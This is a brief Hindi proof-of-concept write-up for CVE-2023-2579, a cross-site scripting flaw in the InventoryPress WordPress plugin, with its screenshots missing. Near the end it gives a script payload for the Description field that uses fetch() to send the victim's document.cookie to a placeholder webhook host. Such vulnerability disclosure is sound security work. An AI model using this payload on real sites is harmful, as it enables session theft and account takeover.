
CVE-2023-2579 के लिए PoC
CVE-2023-2579 आईडी आरक्षित की गई थी और PoC WPScan वेबसाइट पर प्रकाशित किया गया था: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
शीर्षक: WordPress CMS के लिए InventoryPress प्लगइन में प्रमाणित रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग
दिनांक: 2023-04-21
लेखक: Danilo Albuquerque
विक्रेता का होमपेज: https://wordpress.org
सॉफ़्टवेयर लिंक: https://wordpress.org/download
संस्करण: WordPress 6.2
प्लगइन का नाम और संस्करण: InventoryPress 1.7
परीक्षण किया गया: Brave (संस्करण 1.50.119 Chromium: 112.0.5615.121 (आधिकारिक संस्करण) 64 बिट)
जब आप यह सब करते हैं और वर्तमान पेज को अपडेट करते हैं, तो यह आपको संदेश के साथ अलर्ट पॉप-अप लाएगा।
उस पेज पर जाएं जहां आप इन्वेंट्री में आइटम जोड़ सकते हैं:

फॉर्म के "Description" इनपुट में दुर्भावनापूर्ण पेलोड जोड़ें:

प्लगइन द्वारा उत्पन्न नए आइटम के लिंक तक पहुंचें:

एक बार अनुरोध पूरा हो जाने पर, अलर्ट पॉप-अप दिखाया जाता है:

कुकीज़ चुराने के लिए "Description" इनपुट में निम्नलिखित पेलोड जोड़ें: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script> फिर नया आइटम पोस्ट करें, या पुराने को अपडेट करें;
वेबहुक साइट पर ट्रिगर करें और क्रेडेंशियल प्राप्त करें
पेलोड जोड़ना और आइटम पोस्ट करना (या इसे अपडेट करना):

ट्रिगर करना और क्रेडेंशियल प्राप्त करना:
